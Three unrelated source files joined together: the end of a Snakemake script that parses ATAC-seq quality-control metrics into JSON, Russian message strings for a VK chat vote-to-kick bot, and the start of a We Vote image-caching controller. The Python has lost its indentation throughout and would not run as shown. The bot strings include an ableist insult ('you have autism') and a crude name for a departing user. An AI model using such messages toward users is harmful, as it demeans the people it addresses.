result['original_barcode_count'] = to_int(n)
n = m_splice(line, 'Identified ', ' total barcodes for multiplet detection')
if n is not None:
result['analyzed_barcode_count'] = to_int(n)
n = m_splice(line, 'Identified ', ' barcodes belonging to multiplets')
if n is not None:
result['multiplet_barcode_count'] = to_int(n)
n = m_splice(line, 'After multiplet exclusions, have ', ' total cell barcodes')
if n is not None:
result['final_barcode_count'] = to_int(n)
n = m_splice(line, 'Setting multiplet threshold as ', ' for minimum pairwise Jaccard distance')
if n is not None:
result['multiplet_threshold'] = to_float(n)
result['frac_multiplets'] = result['multiplet_barcode_count'] / result['analyzed_barcode_count']
return result
def parse_archr_qc(dt, df, fs, pf, tu):
result = OrderedDict()
if os.path.getsize(dt) > 0:
result["archr_doublet_summary_text"] = {"path": os.path.abspath(dt)}
if os.path.getsize(df) > 0:
result["archr_doublet_summary_figure"] = {"path": os.path.abspath(df)}
if os.path.getsize(fs) > 0:
result["archr_fragment_size_distribution"] = {"path": os.path.abspath(fs)}
if os.path.getsize(pf) > 0:
result["archr_pre_filter_metadata"] = {"path": os.path.abspath(pf)}
with open(pf, 'r') as f:
cols = f.readline().rstrip('\n').split('\t')
frg_ind = cols.index('nFrags')
enr_ind = cols.index('TSSEnrichment')
frgs = []
enrs = []
for line in f:
entries = line.rstrip('\n').split('\t')
frg = to_int(entries[frg_ind])
enr = to_float(entries[enr_ind])
if enr >= 4:
frgs.append(frg)
enrs.append(enr)
result["_num_barcodes_considered"] = len(frgs)
result["median_fragment_count"] = median(frgs)
result["median_tss_enrichment"] = median(enrs)
if os.path.getsize(tu) > 0:
result["archr_tss_by_unique_frags"] = {"path": os.path.abspath(tu)}
return result
def parse_counts_summary_qc(rd, ar, af, lc, nl, an):
result = OrderedDict()
with open(rd, 'r') as f:
d = json.load(f)
has_nrt = False
has_nrm = False
if 'num_reads_total' in d:
has_nrt = True
result['reads_original'] = d['num_reads_total'] * 2
if 'num_reads_matched' in d:
has_nrm = True
result['reads_barcode_matched'] = d['num_reads_matched'] * 2
if has_nrt and has_nrm:
result['_frac_reads_barcode_matched'] = d['num_reads_matched'] * 2 / result['reads_original']
with open(ar, 'r') as f:
d = json.load(f)
result['reads_mapped'] = d['mapped_reads']
result['_frac_reads_mapped'] = d['mapped_reads'] / d['_bwt2_num_reads']
with open(af, 'r') as f:
d = json.load(f)
result['reads_non_mito'] = d['non_mito_reads']
result['_frac_reads_non_mito'] = d['non_mito_reads'] / result['reads_mapped']
with open(lc, 'r') as f:
d = json.load(f)
result['reads_primary_align'] = d['paired_reads'] * 2
result['_frac_reads_primary_align'] = d['paired_reads'] * 2 / result['reads_non_mito']
with open(af, 'r') as f:
d = json.load(f)
result['reads_nodup'] = d['mapped_reads']
result['_frac_reads_nodup'] = d['mapped_reads'] / result['reads_primary_align']
with open(nl, 'r') as f:
d = json.load(f)
result['barcodes_fragments'] = d['original_barcode_count']
result['barcodes_non_multiplet'] = d['final_barcode_count']
result['_frac_barcodes_non_multiplet'] = d['final_barcode_count'] / result['barcodes_fragments']
with open(an, 'r') as f:
d = json.load(f)
result['barcodes_archr'] = d['_num_barcodes_considered']
result['_frac_barcodes_archr'] = d['_num_barcodes_considered'] / result['barcodes_fragments']
return result
def build_quality_metric_header(sample_data, sample_name, config, data_paths, out_path):
lab = config["dcc_lab"]
experiment = sample_data["experiment"]
replicate = sample_data["replicate_num"]
modality = sample_data["modality"]
data_aliases = [f"{lab}:{experiment}${replicate}${os.path.basename(p)}" for p in data_paths]
alias = f"{lab}:{experiment}${replicate}${os.path.basename(out_path)}"
h = OrderedDict({
"_sample": sample_name,
"_modality": modality,
"lab": lab,
"award": config["dcc_award"],
"quality_metric_of": data_aliases,
"aliases": [alias],
# "step_run": step_run
})
return h
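# Example of the alias format built above (values are illustrative only):
#   "my-lab:EXP123$1$summary_stats.json"
# i.e. f"{lab}:{experiment}${replicate}${basename}".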
def write_json(data, out_path):
with open(out_path, "w") as f:
json.dump(data, f, indent=4)
try:
out_group = snakemake.params['output_group']
sample_data = snakemake.params['sample_data']
sample_name = snakemake.params['sample_name']
config = snakemake.config
if out_group == "fastqs":
read_stats_out = snakemake.output['read_stats']
barcode_matching = snakemake.input['barcode_matching']
adapter_trimming = snakemake.input['adapter_trimming']
barcode_revcomp = snakemake.input['barcode_revcomp']
data_paths = [snakemake.input['data_file']]
m = parse_barcode_matching_qc(barcode_matching)
a = parse_adapter_trimming_qc(adapter_trimming)
r = parse_barcode_revcomp_qc(barcode_revcomp)
h = build_quality_metric_header(sample_data, sample_name, config, data_paths, read_stats_out)
read_stats = h | m | a | r
write_json(read_stats, read_stats_out)
elif out_group == "mapping":
alignment_stats_out = snakemake.output['alignment_stats']
samstats_raw = snakemake.input['samstats_raw']
bwt2_stats = snakemake.input['bwt2_stats']
data_paths = [snakemake.input['data_file']]
a = parse_flagstat_qc(samstats_raw)
b = parse_bwt2_qc(bwt2_stats)
h = build_quality_metric_header(sample_data, sample_name, config, data_paths, alignment_stats_out)
alignment_stats = h | a | b
write_json(alignment_stats, alignment_stats_out)
elif out_group == "filtering":
alignment_stats_out = snakemake.output['alignment_stats']
lib_comp_stats_out = snakemake.output['lib_comp_stats']
samstats_filtered = snakemake.input['samstats_filtered']
picard_markdup = snakemake.input['picard_markdup']
pbc_stats = snakemake.input['pbc_stats']
frac_mito = snakemake.input['frac_mito']
data_paths = [snakemake.input['data_file']]
s = parse_flagstat_qc(samstats_filtered)
p = parse_dup_qc(picard_markdup)
l = parse_lib_complexity_qc(pbc_stats)
m = parse_frac_mito_qc(frac_mito)
ha = build_quality_metric_header(sample_data, sample_name, config, data_paths, alignment_stats_out)
hl = build_quality_metric_header(sample_data, sample_name, config, data_paths, lib_comp_stats_out)
alignment_stats = ha | s | m
lib_comp_stats = hl | p | l
write_json(alignment_stats, alignment_stats_out)
write_json(lib_comp_stats, lib_comp_stats_out)
elif out_group == "fragments":
fragments_stats_out = snakemake.output['fragments_stats']
multiplet_stats = snakemake.input['multiplet_stats']
barcodes_pairs_strict = snakemake.input['barcode_pairs_strict']
barcodes_pairs_expanded = snakemake.input['barcode_pairs_expanded']
barcodes_status = snakemake.input['barcodes_status']
multiplets_thresh = snakemake.input['multiplets_thresh']
data_paths = [snakemake.input['data_file']]
m = multiplet_detection_qc(
multiplet_stats,
barcodes_pairs_strict,
barcodes_pairs_expanded,
barcodes_status,
multiplets_thresh
)
h = build_quality_metric_header(sample_data, sample_name, config, data_paths, fragments_stats_out)
fragments_stats = h | m
write_json(fragments_stats, fragments_stats_out)
elif out_group == "analyses":
analyses_stats_out = snakemake.output['analyses_stats']
archr_doublet_summary_text = snakemake.input['archr_doublet_summary_text']
archr_doublet_summary_figure = snakemake.input['archr_doublet_summary_figure']
archr_fragment_size_distribution = snakemake.input['archr_fragment_size_distribution']
archr_pre_filter_metadata = snakemake.input['archr_pre_filter_metadata']
archr_tss_by_unique_frags = snakemake.input['archr_tss_by_unique_frags']
data_paths = [snakemake.input['data_file']]
f = parse_archr_qc(
archr_doublet_summary_text,
archr_doublet_summary_figure,
archr_fragment_size_distribution,
archr_pre_filter_metadata,
archr_tss_by_unique_frags
)
h = build_quality_metric_header(sample_data, sample_name, config, data_paths, analyses_stats_out)
analyses_stats = h | f
write_json(analyses_stats, analyses_stats_out)
elif out_group == "summary":
summary_stats_out = snakemake.output['summary_stats']
read_stats = snakemake.input['read_stats']
alignment_stats_raw = snakemake.input['alignment_stats_raw']
alignment_stats_filtered = snakemake.input['alignment_stats_filtered']
lib_comp_stats = snakemake.input['lib_comp_stats']
fragments_stats = snakemake.input['fragments_stats']
analyses_stats = snakemake.input['analyses_stats']
data_paths = [snakemake.input['data_file']]
s = parse_counts_summary_qc(
read_stats,
alignment_stats_raw,
alignment_stats_filtered,
lib_comp_stats,
fragments_stats,
analyses_stats
)
h = build_quality_metric_header(sample_data, sample_name, config, data_paths, summary_stats_out)
summary_stats = h | s
write_json(summary_stats, summary_stats_out)
except NameError:
pass
|
'''
BOT MESSAGES
VOTEBAN BOT
'''
prefix = '[VOTEBAN] '
# Messages with format placeholders:
finish_vote = prefix + 'Голосование за кик {0} завершено. Голосов за: {1}, голосов против: {2}.'
start_vote = prefix + 'Кикаем [{0}|{1}]?\nЧтобы проголосовать за - пишите "!да" / "!+" / "!yes". Против - "!нет" / "!-" / "!no"\nГолосование продлится {2} минут(у/ы).\n' \
'Для голосования необходимо набрать {3} голосов'
vote_accepted = prefix + 'Голос принят. Кол-во голосов за кик: {0}. Кол-во голосов против кика: {1}'
help = prefix + '''Вас приветствует бот, позволяющий делать голосование за исключение какого-либо пользователя.
Комманды:
- !voteban ID_ПОЛЬЗОВАТЕЛЯ - создать голосование. ID пользователя находится в его ссылке после vk.com/. Голосование длится {0} минут(у/ы). Условия исключения: голосовало более {1} участников беседы, голосов "за" набрано больше, чем "против"
- !votehelp - Помощь по использованию бота
- !banlist - Просмотреть заблокированных в этой беседе пользователей
- !uptime - Время работы бота
- !authors - узнать создателей бота
- !unban ID_ПОЛЬЗОВАТЕЛЯ [ТОЛЬКО ДЛЯ АДМИНИСТРАТОРОВ БЕСЕДЫ] - разблокировать пользователя
- !addinbanlist ID_ПОЛЬЗОВАТЕЛЯ [ТОЛЬКО ДЛЯ АДМИНИСТРАТОРОВ БЕСЕДЫ] - принудительно добавить пользователя в бан-лист
- !setvotecount кол-во [ТОЛЬКО ДЛЯ АДМИНИСТРАТОРОВ БЕСЕДЫ] - устанавливает минимальное количество человек, необходимое для голосования (по дефолту 5)
- !setvotetime время [ТОЛЬКО ДЛЯ АДМИНИСТРАТОРОВ БЕСЕДЫ] - устанавливает время, необходимое для голосования (по дефолту 2 минуты)
Со временем функционал бота будет пополняться.'''
authors = 'Авторы бота: [id136385345|Сашка Панкратьев] и [id138738887|Лёшка Лепёшка]'
unban_user = prefix + '{0} разбанен(а). Можете возвращать в беседу!'
no_votes_cast = prefix + 'Не набрано достаточное количество голосов (Набрано: {0}, необходимо: {1}).\nТак что пользователь остается в беседе... Пока что...'
# Constant messages
you_have_autism = prefix + 'У ВАС АУТИЗМ, ВЫ ДАЖЕ ЧИСЛО НОРМАЛЬНОЕ ВВЕСТИ НЕ МОЖЕТЕ :('
settime = prefix + 'Я установил время голосования, равное: {0} минут(ам)'
setvote = prefix + 'Я установил кол-во голосов, равное: {0} '
can_not_kick_user = prefix + 'Ошибка: Не могу выгнать этого пользователя'
user_is_admin = prefix + 'Ошибка: Пользователь является администратором'
user_not_in_chat = prefix + 'Ошибка: Пользователь не в беседе'
user_not_found = prefix + 'Ошибка: Такого пользователя не существует'
err_vote_for_yourself = prefix + 'Ошибка: Нельзя голосовать самому за себя!'
no_rights_for_kicks = prefix + 'Не могу выгнать пользователя. Скорее всего, меня лишили прав администратора'
no_user_in_banlist = prefix + 'Ошибка: Такого юзера нету в бан-листе...'
banned_user_came_in = prefix + 'Ну вот мы и встретились...'
user_excluded = prefix + 'Пользователь исключен'
user_leave = prefix + 'Этот говнюк ливнул. Зайдет - кикну'
user_remains = prefix + 'Пользователь остается в беседе... Пока что...'
no_admin_rights = prefix + 'Ошибка: У меня нет прав администратора'
voting_is_active = prefix + 'Ошибка: Голосование уже идет.'
you_are_not_admin = prefix + 'Ошибка: Вы не администратор.'
banned_list = prefix + 'СПИСОК ЗАБАНЕННЫХ ПОЛЬЗОВАТЕЛЕЙ: \n\n'
banlist_empty = prefix + 'Бан-лист пуст.'
user_added_in_banlist = prefix + 'Пользователь добавлен в бан-лист.'
user_already_in_banlist = prefix + 'Ошибка: Пользователь уже в бан-листе'
my_uptime = prefix + 'UPTIME: \n'
time_format = '{0} дней, {1} часов, {2} минут, {3} секунд'
|
# image/controllers.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
import requests
import wevote_functions.admin
from .functions import analyze_remote_url, analyze_image_file, analyze_image_in_memory
from .models import WeVoteImageManager, WeVoteImage, \
CHOSEN_FAVICON_NAME, CHOSEN_LOGO_NAME, CHOSEN_SOCIAL_SHARE_IMAGE_NAME, \
FACEBOOK_PROFILE_IMAGE_NAME, FACEBOOK_BACKGROUND_IMAGE_NAME, \
TWITTER_PROFILE_IMAGE_NAME, TWITTER_BACKGROUND_IMAGE_NAME, TWITTER_BANNER_IMAGE_NAME, MAPLIGHT_IMAGE_NAME, \
VOTE_SMART_IMAGE_NAME, MASTER_IMAGE, ISSUE_IMAGE_NAME, BALLOTPEDIA_IMAGE_NAME, CAMPAIGNX_PHOTO_IMAGE_NAME, \
LINKEDIN_IMAGE_NAME, WIKIPEDIA_IMAGE_NAME
from candidate.models import CandidateManager
from config.base import get_environment_variable
from django.db.models import Q
from import_export_facebook.models import FacebookManager
from issue.models import IssueManager
from organization.models import OrganizationManager
from politician.models import PoliticianManager
from position.controllers import reset_all_position_image_details_from_candidate, \
reset_position_for_friends_image_details_from_voter, reset_position_entered_image_details_from_organization, \
update_all_position_details_from_candidate
from twitter.functions import retrieve_twitter_user_info
from twitter.models import TwitterUserManager
from voter.models import VoterManager, VoterDeviceLink, VoterDeviceLinkManager, VoterAddressManager, VoterAddress, Voter
from voter_guide.models import VoterGuideManager
from wevote_functions.functions import positive_value_exists, convert_to_int
logger = wevote_functions.admin.get_logger(__name__)
HTTP_OK = 200
# These constants are used for "image_source", which is not a WeVoteImage table value, but gets used in the
# controller code to set table booleans like kind_of_image_twitter_profile and kind_of_image_facebook_profile.
# "other_source" is a database table value that is not given its own "kind_of_image..." table boolean
TWITTER = "twitter"
FACEBOOK = "facebook"
MAPLIGHT = "maplight"
VOTE_SMART = "vote_smart"
BALLOTPEDIA_IMAGE_SOURCE = "ballotpedia"
LINKEDIN = "linkedin"
WIKIPEDIA = "wikipedia"
OTHER_SOURCE = "other_source" # Set "kind_of_image_other_source" to true
MAPLIGHT_URL_NOT_FOUND = "maplight url not found"
VOTE_SMART_URL_NOT_FOUND = "votesmart url not found"
BALLOTPEDIA_URL_NOT_FOUND = "ballotpedia url not found"
CAMPAIGNX_PHOTO_URL_NOT_FOUND = "campaignx photo url not found"
LINKEDIN_URL_NOT_FOUND = "linkedin url not found"
WIKIPEDIA_URL_NOT_FOUND = "wikipedia url not found"
OTHER_SOURCE_URL_NOT_FOUND = "other source url not found"
FACEBOOK_USER_DOES_NOT_EXIST = "facebook user does not exist"
FACEBOOK_URL_NOT_FOUND = "facebook url not found"
TWITTER_USER_DOES_NOT_EXIST = "twitter user does not exist"
TWITTER_URL_NOT_FOUND = "twitter url not found"
IMAGE_ALREADY_CACHED = "image already cached"
ALL_KIND_OF_IMAGE = ['kind_of_image_twitter_profile', 'kind_of_image_twitter_background',
'kind_of_image_twitter_banner', 'kind_of_image_facebook_profile',
'kind_of_image_facebook_background', 'kind_of_image_maplight', 'kind_of_image_vote_smart']
# Search for these in campaign/controllers.py as well
# Facebook shared image: 1200 x 630
# Facebook shared link: 1200 x 628
# Tweet with image in shared link: 1200 x 628
# Tweet with single image: 1200 x 675 (Twitter recommended aspect ratio is 16:9)
CAMPAIGN_PHOTO_ORIGINAL_MAX_WIDTH = 1200
CAMPAIGN_PHOTO_ORIGINAL_MAX_HEIGHT = 628
CAMPAIGN_PHOTO_LARGE_MAX_WIDTH = 575
CAMPAIGN_PHOTO_LARGE_MAX_HEIGHT = 301
CAMPAIGN_PHOTO_MEDIUM_MAX_WIDTH = 224
CAMPAIGN_PHOTO_MEDIUM_MAX_HEIGHT = 117
CAMPAIGN_PHOTO_SMALL_MAX_WIDTH = 140
CAMPAIGN_PHOTO_SMALL_MAX_HEIGHT = 73
PROFILE_IMAGE_LARGE_WIDTH = convert_to_int(get_environment_variable("PROFILE_IMAGE_LARGE_WIDTH"))
PROFILE_IMAGE_LARGE_HEIGHT = convert_to_int(get_environment_variable("PROFILE_IMAGE_LARGE_HEIGHT"))
PROFILE_IMAGE_MEDIUM_WIDTH = convert_to_int(get_environment_variable("PROFILE_IMAGE_MEDIUM_WIDTH"))
PROFILE_IMAGE_MEDIUM_HEIGHT = convert_to_int(get_environment_variable("PROFILE_IMAGE_MEDIUM_HEIGHT"))
PROFILE_IMAGE_TINY_WIDTH = convert_to_int(get_environment_variable("PROFILE_IMAGE_TINY_WIDTH"))
PROFILE_IMAGE_TINY_HEIGHT = convert_to_int(get_environment_variable("PROFILE_IMAGE_TINY_HEIGHT"))
ISSUES_IMAGE_LARGE_WIDTH = convert_to_int(get_environment_variable("ISSUES_IMAGE_LARGE_WIDTH"))
ISSUES_IMAGE_LARGE_HEIGHT = convert_to_int(get_environment_variable("ISSUES_IMAGE_LARGE_HEIGHT"))
ISSUES_IMAGE_MEDIUM_WIDTH = convert_to_int(get_environment_variable("ISSUES_IMAGE_MEDIUM_WIDTH"))
ISSUES_IMAGE_MEDIUM_HEIGHT = convert_to_int(get_environment_variable("ISSUES_IMAGE_MEDIUM_HEIGHT"))
ISSUES_IMAGE_TINY_WIDTH = convert_to_int(get_environment_variable("ISSUES_IMAGE_TINY_WIDTH"))
ISSUES_IMAGE_TINY_HEIGHT = convert_to_int(get_environment_variable("ISSUES_IMAGE_TINY_HEIGHT"))
AWS_STORAGE_BUCKET_NAME = get_environment_variable("AWS_STORAGE_BUCKET_NAME")
try:
SOCIAL_BACKGROUND_IMAGE_WIDTH = convert_to_int(get_environment_variable("SOCIAL_BACKGROUND_IMAGE_WIDTH"))
SOCIAL_BACKGROUND_IMAGE_HEIGHT = convert_to_int(get_environment_variable("SOCIAL_BACKGROUND_IMAGE_HEIGHT"))
except Exception:
# In case not defined in a dev environment, use the default values which come from the Sept 2017 size of the react
# image class="organization-banner-image-img"
logger.error(
"SOCIAL_BACKGROUND_IMAGE_WIDTH and/or SOCIAL_BACKGROUND_IMAGE_HEIGHT not defined in environment_variables.")
SOCIAL_BACKGROUND_IMAGE_HEIGHT = 200 # HTML x
SOCIAL_BACKGROUND_IMAGE_WIDTH = 900 # HTML y
def cache_all_kind_of_images_locally_for_all_organizations():
"""
    Cache all kinds of images locally for all organizations
:return:
"""
cache_images_locally_for_all_organizations_results = []
# TODO Update this for organizations
# voter_list = Voter.objects.all()
#
# # If there is a value in twitter_id OR facebook_id, return the voter
# image_filters = []
# new_filter = Q(twitter_id__isnull=False)
# image_filters.append(new_filter)
# new_filter = Q(facebook_id__isnull=False)
# image_filters.append(new_filter)
#
# # Add the first query
# final_filters = image_filters.pop()
#
# # ...and "OR" the remaining items in the list
# for item in image_filters:
# final_filters |= item
#
# # voter_list = voter_list.filter(final_filters)
# voter_list = voter_list.order_by('-is_admin', '-is_verified_volunteer', 'facebook_email', 'twitter_screen_name',
# 'last_name', 'first_name')
# voter_list = voter_list[:200] # Limit to 200 for now
#
# for voter in voter_list:
# cache_images_for_one_organization_results = migrate_remote_voter_image_urls_to_local_cache(voter.id)
# cache_images_locally_for_all_organizations_results.append(cache_images_for_one_organization_results)
return cache_images_locally_for_all_organizations_results
def cache_all_kind_of_images_locally_for_all_voters():
"""
    Cache all kinds of images locally for all voters
:return:
"""
cache_images_locally_for_all_voters_results = []
voter_list = Voter.objects.all()
# If there is a value in twitter_id OR facebook_id, return the voter
image_filters = []
new_filter = Q(twitter_id__isnull=False)
image_filters.append(new_filter)
new_filter = Q(facebook_id__isnull=False)
image_filters.append(new_filter)
# Add the first query
final_filters = image_filters.pop()
# ...and "OR" the remaining items in the list
for item in image_filters:
final_filters |= item
# voter_list = voter_list.filter(final_filters)
voter_list = voter_list.order_by('-is_admin', '-is_verified_volunteer', 'facebook_email', 'twitter_screen_name',
'last_name', 'first_name')
voter_list = voter_list[:200] # Limit to 200 for now
for voter in voter_list:
cache_images_for_a_voter_results = cache_voter_master_images(voter.id)
cache_images_locally_for_all_voters_results.append(cache_images_for_a_voter_results)
return cache_images_locally_for_all_voters_results
def cache_image_if_not_cached(
google_civic_election_id=0,
image_url_https='',
voter_we_vote_id=None,
candidate_we_vote_id=None,
organization_we_vote_id=None,
issue_we_vote_id=None,
twitter_id=None,
twitter_screen_name=None,
facebook_user_id=None,
maplight_id=None,
vote_smart_id=None,
is_active_version=False,
kind_of_image_twitter_profile=False,
kind_of_image_twitter_background=False,
kind_of_image_twitter_banner=False,
kind_of_image_facebook_profile=False,
kind_of_image_facebook_background=False,
kind_of_image_maplight=False,
kind_of_image_vote_smart=False,
kind_of_image_issue=False,
kind_of_image_ballotpedia_profile=False,
kind_of_image_linkedin_profile=False,
kind_of_image_wikipedia_profile=False,
kind_of_image_other_source=False,
kind_of_image_original=False,
facebook_background_image_offset_x=None,
facebook_background_image_offset_y=None,
other_source=None):
"""
    Check whether the image is already cached. If it is not, cache it.
:param google_civic_election_id:
:param image_url_https:
:param voter_we_vote_id:
:param candidate_we_vote_id:
:param organization_we_vote_id:
:param issue_we_vote_id:
:param twitter_id:
:param twitter_screen_name:
:param facebook_user_id:
:param maplight_id:
:param vote_smart_id:
:param is_active_version:
:param kind_of_image_twitter_profile:
:param kind_of_image_twitter_background:
:param kind_of_image_twitter_banner:
:param kind_of_image_facebook_profile:
:param kind_of_image_facebook_background:
:param kind_of_image_maplight:
:param kind_of_image_vote_smart:
:param kind_of_image_issue:
:param kind_of_image_ballotpedia_profile:
:param kind_of_image_linkedin_profile:
:param kind_of_image_wikipedia_profile:
:param kind_of_image_other_source:
:param kind_of_image_original:
:param facebook_background_image_offset_x:
:param facebook_background_image_offset_y:
:param other_source:
:return:
"""
we_vote_image_manager = WeVoteImageManager()
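    # Look for the most recently cached active image of this kind for this owner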
cached_we_vote_image_results = we_vote_image_manager.retrieve_recent_cached_we_vote_image(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
issue_we_vote_id=issue_we_vote_id,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_original=kind_of_image_original,
is_active_version=True)
    # If the most recently cached image matches the current one, the image is already cached
cached_we_vote_image = cached_we_vote_image_results['we_vote_image']
    if cached_we_vote_image_results['we_vote_image_found'] and \
            (image_url_https == cached_we_vote_image.twitter_profile_image_url_https or
             image_url_https == cached_we_vote_image.twitter_profile_background_image_url_https or
             image_url_https == cached_we_vote_image.twitter_profile_banner_url_https or
             image_url_https == cached_we_vote_image.facebook_profile_image_url_https or
             image_url_https == cached_we_vote_image.facebook_background_image_url_https or
             image_url_https == cached_we_vote_image.maplight_image_url_https or
             image_url_https == cached_we_vote_image.vote_smart_image_url_https or
             image_url_https == cached_we_vote_image.issue_image_url_https or
             image_url_https == cached_we_vote_image.ballotpedia_profile_image_url or
             image_url_https == cached_we_vote_image.linkedin_profile_image_url or
             image_url_https == cached_we_vote_image.wikipedia_profile_image_url or
             image_url_https == cached_we_vote_image.other_source_image_url):
cache_image_results = IMAGE_ALREADY_CACHED
else:
        # Image is not cached yet, so cache it now
cache_image_locally_results = cache_image_locally(
google_civic_election_id=google_civic_election_id,
image_url_https=image_url_https,
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
issue_we_vote_id=issue_we_vote_id,
twitter_id=twitter_id,
facebook_user_id=facebook_user_id,
maplight_id=maplight_id,
vote_smart_id=vote_smart_id,
twitter_screen_name=twitter_screen_name,
is_active_version=is_active_version,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_original=kind_of_image_original,
facebook_background_image_offset_x=facebook_background_image_offset_x,
facebook_background_image_offset_y=facebook_background_image_offset_y,
other_source=other_source,
)
cache_image_results = cache_image_locally_results['success']
if cache_image_results:
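            # A newer copy is now cached, so mark any previously cached versions of this image as inactive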
set_active_version_false_results = we_vote_image_manager.set_active_version_false_for_other_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
issue_we_vote_id=issue_we_vote_id,
image_url_https=image_url_https,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,)
return cache_image_results
def cache_organization_master_images(organization_we_vote_id):
"""
    Cache all kinds of master images for an organization, such as profile and background images
:param organization_we_vote_id:
:return:
"""
cache_all_kind_of_images_results = {
'organization_we_vote_id': "",
'cached_twitter_profile_image': False,
'cached_twitter_background_image': False,
'cached_twitter_banner_image': False,
'cached_facebook_profile_image': False,
'cached_facebook_background_image': False
}
google_civic_election_id = 0
twitter_id = None
organization_manager = OrganizationManager()
organization_results = organization_manager.retrieve_organization_from_we_vote_id(organization_we_vote_id)
if not organization_results['organization_found']:
return cache_all_kind_of_images_results
organization = organization_results['organization']
organization_we_vote_id = organization.we_vote_id
if positive_value_exists(organization_we_vote_id):
cache_all_kind_of_images_results['organization_we_vote_id'] = organization_we_vote_id
else:
return cache_all_kind_of_images_results
twitter_user_manager = TwitterUserManager()
twitter_screen_name = ''
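    # Look up the Twitter account linked to this organization, if there is one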
twitter_link_to_organization_results = \
twitter_user_manager.retrieve_twitter_link_to_organization_from_organization_we_vote_id(organization_we_vote_id)
if twitter_link_to_organization_results['twitter_link_to_organization_found']:
twitter_link_to_organization = twitter_link_to_organization_results['twitter_link_to_organization']
twitter_id = twitter_link_to_organization.twitter_id
twitter_screen_name = twitter_link_to_organization.fetch_twitter_handle_locally_or_remotely()
if not positive_value_exists(twitter_id):
cache_all_kind_of_images_results = {
'organization_we_vote_id': organization_we_vote_id,
'organization': organization,
'cached_twitter_profile_image': TWITTER_USER_DOES_NOT_EXIST,
'cached_twitter_background_image': TWITTER_USER_DOES_NOT_EXIST,
'cached_twitter_banner_image': TWITTER_USER_DOES_NOT_EXIST,
}
return cache_all_kind_of_images_results
# Retrieve latest twitter image urls from Twitter
latest_image_urls_results = retrieve_image_urls_from_twitter(twitter_id)
twitter_profile_image_url_https = latest_image_urls_results['latest_twitter_profile_image_url']
twitter_profile_background_image_url_https = latest_image_urls_results['latest_twitter_background_image_url']
twitter_profile_banner_url_https = latest_image_urls_results['latest_twitter_banner_image_url']
# Cache all images if not already cached
if not twitter_profile_image_url_https:
cache_all_kind_of_images_results['cached_twitter_profile_image'] = TWITTER_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_twitter_profile_image'] = cache_image_if_not_cached(
google_civic_election_id, twitter_profile_image_url_https, organization_we_vote_id=organization_we_vote_id,
twitter_id=twitter_id, twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_profile=True, kind_of_image_original=True)
if not twitter_profile_background_image_url_https:
cache_all_kind_of_images_results['cached_twitter_background_image'] = TWITTER_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_twitter_background_image'] = cache_image_if_not_cached(
google_civic_election_id, twitter_profile_background_image_url_https,
organization_we_vote_id=organization_we_vote_id, twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_background=True, kind_of_image_original=True)
if not twitter_profile_banner_url_https:
cache_all_kind_of_images_results['cached_twitter_banner_image'] = TWITTER_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_twitter_banner_image'] = cache_image_if_not_cached(
google_civic_election_id, twitter_profile_banner_url_https,
organization_we_vote_id=organization_we_vote_id, twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_banner=True, kind_of_image_original=True)
return cache_all_kind_of_images_results
def cache_voter_master_images(voter_id):
"""
    Cache all kinds of images locally for a voter, such as profile and background images
:param voter_id:
:return:
"""
cache_all_kind_of_images_results = {
'voter_id': voter_id,
'voter_we_vote_id': "",
'cached_twitter_profile_image': False,
'cached_twitter_background_image': False,
'cached_twitter_banner_image': False,
'cached_facebook_profile_image': False,
'cached_facebook_background_image': False
}
google_civic_election_id = 0
twitter_id = None
facebook_id = None
voter_address_manager = VoterAddressManager()
voter_manager = VoterManager()
voter_device_link_manager = VoterDeviceLinkManager()
voter_results = voter_manager.retrieve_voter_by_id(voter_id)
if not voter_results['voter_found']:
return cache_all_kind_of_images_results
voter = voter_results['voter']
if positive_value_exists(voter.we_vote_id):
